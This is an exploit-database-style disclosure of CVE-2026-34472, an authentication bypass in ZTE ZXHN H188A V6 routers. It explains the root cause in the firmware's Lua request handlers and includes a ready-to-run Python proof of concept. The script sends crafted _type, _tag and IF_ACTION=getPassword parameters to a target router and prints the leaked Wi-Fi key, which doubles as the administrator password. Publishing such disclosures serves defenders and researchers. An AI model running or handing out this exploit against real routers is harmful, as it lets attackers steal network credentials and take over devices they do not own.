# Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass # Date: 2026-05-20 # Exploit Author: Mina Nageh Salalma (Monx Research) # Vendor Homepage: https://www.zte.com.cn # Software Link: https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router # Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE # Tested on: ZTE ZXHN H188A V6.0.10P2_TE # CVE: CVE-2026-34472 # Description: # Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware # can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and # PPPoE usernames. The leaked Wi-Fi password is also the default administrator # password after uppercasing, resulting in full authentication bypass. # # Root cause: router_logic_impl.lua accepts _type and _tag directly for # empty-path requests. urlpath_2type_modifier.lua only applies QuickSetupEnable # when _type is missing. Wizard handlers then expose credential-bearing read # actions (getPassword, wlan_get, ppp_get) for unauthenticated users. # # Approximately 500 publicly exposed H188A interfaces were reachable at # time of original report (May 2024). ZTE PSIRT stopped responding; CVE # assigned by MITRE on 2026-03-27 after escalation. # # MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472 # PoC - Trigger wizard credential endpoint (Python 3 / requests) import requests import sys def exploit(target): url = f"http://{target}/" # Craft request with _type parameter to bypass QuickSetupEnable gate params = {"_type": "loginData", "_tag": "login_entry"} headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"} try: r = requests.post(url, params=params, headers=headers, data=data, timeout=10, verify=False) print(f"[+] {target} HTTP {r.status_code}") print(r.text[:2000]) except Exception as e: print(f"[-] {target}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: poc.py ") sys.exit(1) exploit(sys.argv[1])